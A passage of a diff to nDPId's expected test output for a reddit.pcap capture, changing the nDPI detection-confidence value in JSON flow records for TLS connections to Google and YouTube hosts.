{"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"static.doubleclick.net","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4492,"source":"reddit.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291688830,"flow_last_seen":1605291688830,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291688830,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2001","src_port":58122,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4492,"source":"reddit.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1605291688830,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291688830,"pkt":"qtsDr8lk5EKm5WPyht1gBrB0ACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBQAAAAAAACAB4woBuyKqv5AAAAAAoAL9IFwjAAACBAWgBAIICu7gTZEAAAAAAQMDBw=="} 00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4499,"source":"reddit.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291688831,"flow_last_seen":1605291688831,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291688831,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:815::2016","src_port":52296,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
@@ -263,55 +263,55 @@ 00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4537,"source":"reddit.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1605291688843,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291688843,"pkt":"qtsDr8lk5EKm5WPyht1gAjZHACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIDAAAAAAAACADuMYBu5\/Vp\/oAAAAAoAL9IC3PAAACBAWgBAIICjfz93gAAAAAAQMDBw=="} 00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4538,"source":"reddit.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291688843,"flow_last_seen":1605291688843,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291688843,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80c::2003","src_port":47304,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4538,"source":"reddit.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1605291688843,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291688843,"pkt":"qtsDr8lk5EKm5WPyht1gC3ZcACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIDAAAAAAAACADuMgBu1ulIdYAAAAAoAL9IPghAAACBAWgBAIICjfz93gAAAAAAQMDBw=="} 
-00991{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4539,"source":"reddit.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291688749,"flow_last_seen":1605291688848,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291688848,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2004","src_port":57282,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00991{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4539,"source":"reddit.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291688749,"flow_last_seen":1605291688848,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291688848,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2004","src_port":57282,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4815,"source":"reddit.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":2,"flow_last_seen":1605291688889,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291688889,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgMAAAAAAAAIAMqAcsBIEmLB5kd7IUo3\/YpAbu4xvp17E2f1af7oBJXgOZHAAACBAV4AQMDAwQCCArC10OnN\/P3eA=="} 00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4816,"source":"reddit.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1605291688889,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291688889,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgMAAAAAAAAIAMqAcsBIEmLB5kd7IUo3\/YpAbu4yD8lZERbpSHXoBJXgPP1AAACBAV4AQMDAwQCCArC10OmN\/P3eA=="} 00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4820,"source":"reddit.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":3,"flow_last_seen":1605291688889,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291688889,"pkt":"qtsDr8lk5EKm5WPyht1gAjZHACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIDAAAAAAAACADuMYBu5\/Vp\/v6dexOgBAB+2orAAABAQgKN\/P3psLXQ6c="} 
00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4821,"source":"reddit.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":3,"flow_last_seen":1605291688889,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291688889,"pkt":"qtsDr8lk5EKm5WPyht1gC3ZcACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIDAAAAAAAACADuMgBu1ulIdc\/JWRFgBAB+3fZAAABAQgKN\/P3psLXQ6Y="} -00953{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4826,"source":"reddit.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291688843,"flow_last_seen":1605291688889,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291688889,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80c::2003","src_port":47302,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fonts.gstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-00953{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4827,"source":"reddit.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291688843,"flow_last_seen":1605291688889,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291688889,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80c::2003","src_port":47304,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fonts.gstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00953{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4826,"source":"reddit.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291688843,"flow_last_seen":1605291688889,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291688889,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80c::2003","src_port":47302,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fonts.gstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00953{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4827,"source":"reddit.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291688843,"flow_last_seen":1605291688889,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291688889,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80c::2003","src_port":47304,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fonts.gstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4856,"source":"reddit.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1605291688893,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291688893,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgFAAAAAAAAIAEqAcsBIEmLB5kd7IUo3\/YpAbvjCkXQfikiqr+RoBJXgDd0AAACBAV4AQMDAwQCCArC10OZ7uBNkQ=="} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4858,"source":"reddit.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":3,"flow_last_seen":1605291688893,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291688893,"pkt":"qtsDr8lk5EKm5WPyht1gBrB0ACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBQAAAAAAACAB4woBuyKqv5FF0H4qgBAB+7tFAAABAQgK7uBN0cLXQ5k="} 
-00945{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4861,"source":"reddit.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291688830,"flow_last_seen":1605291688894,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291688894,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2001","src_port":58122,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.YouTube","breed":"Fun","category":"Media"},"tls": {"version":"TLSv1.2","client_requested_server_name":"yt3.ggpht.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00945{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4861,"source":"reddit.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291688830,"flow_last_seen":1605291688894,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291688894,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2001","src_port":58122,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.YouTube","breed":"Fun","category":"Media"},"tls": {"version":"TLSv1.2","client_requested_server_name":"yt3.ggpht.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4865,"source":"reddit.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1605291688894,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291688894,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgVAAAAAAAAIBYqAcsBIEmLB5kd7IUo3\/YpAbvMSCvRvaZMy7vtoBJXgIUlAAACBAV4AQMDAwQCCArC10OaRJp0xw=="} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4867,"source":"reddit.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":3,"flow_last_seen":1605291688894,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291688894,"pkt":"qtsDr8lk5EKm5WPyht1gDPOvACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFQAAAAAAACAWzEgBu0zLu+0r0b2ngBAB+wj4AAABAQgKRJp1BsLXQ5o="} -00943{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4885,"source":"reddit.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291688831,"flow_last_seen":1605291688895,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291688895,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:815::2016","src_port":52296,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.YouTube","breed":"Fun","category":"Media"},"tls": {"version":"TLSv1.2","client_requested_server_name":"i.ytimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-00986{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5588,"source":"reddit.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291688830,"flow_last_seen":1605291688963,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291688963,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2001","src_port":58122,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.YouTube","breed":"Fun","category":"Media"},"tls": {"version":"TLSv1.3","client_requested_server_name":"yt3.ggpht.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00984{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5606,"source":"reddit.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291688831,"flow_last_seen":1605291688963,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291688963,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:815::2016","src_port":52296,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.YouTube","breed":"Fun","category":"Media"},"tls": {"version":"TLSv1.3","client_requested_server_name":"i.ytimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-00994{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5611,"source":"reddit.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291688843,"flow_last_seen":1605291688963,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291688963,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80c::2003","src_port":47302,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"fonts.gstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00994{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5621,"source":"reddit.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291688843,"flow_last_seen":1605291688963,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291688963,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80c::2003","src_port":47304,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"fonts.gstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00943{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4885,"source":"reddit.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291688831,"flow_last_seen":1605291688895,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291688895,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:815::2016","src_port":52296,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.YouTube","breed":"Fun","category":"Media"},"tls": {"version":"TLSv1.2","client_requested_server_name":"i.ytimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00986{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5588,"source":"reddit.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291688830,"flow_last_seen":1605291688963,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291688963,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2001","src_port":58122,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.YouTube","breed":"Fun","category":"Media"},"tls": {"version":"TLSv1.3","client_requested_server_name":"yt3.ggpht.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00984{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5606,"source":"reddit.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291688831,"flow_last_seen":1605291688963,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291688963,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:815::2016","src_port":52296,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.YouTube","breed":"Fun","category":"Media"},"tls": {"version":"TLSv1.3","client_requested_server_name":"i.ytimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00994{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5611,"source":"reddit.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291688843,"flow_last_seen":1605291688963,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291688963,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80c::2003","src_port":47302,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"fonts.gstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00994{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5621,"source":"reddit.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291688843,"flow_last_seen":1605291688963,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291688963,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80c::2003","src_port":47304,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"fonts.gstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 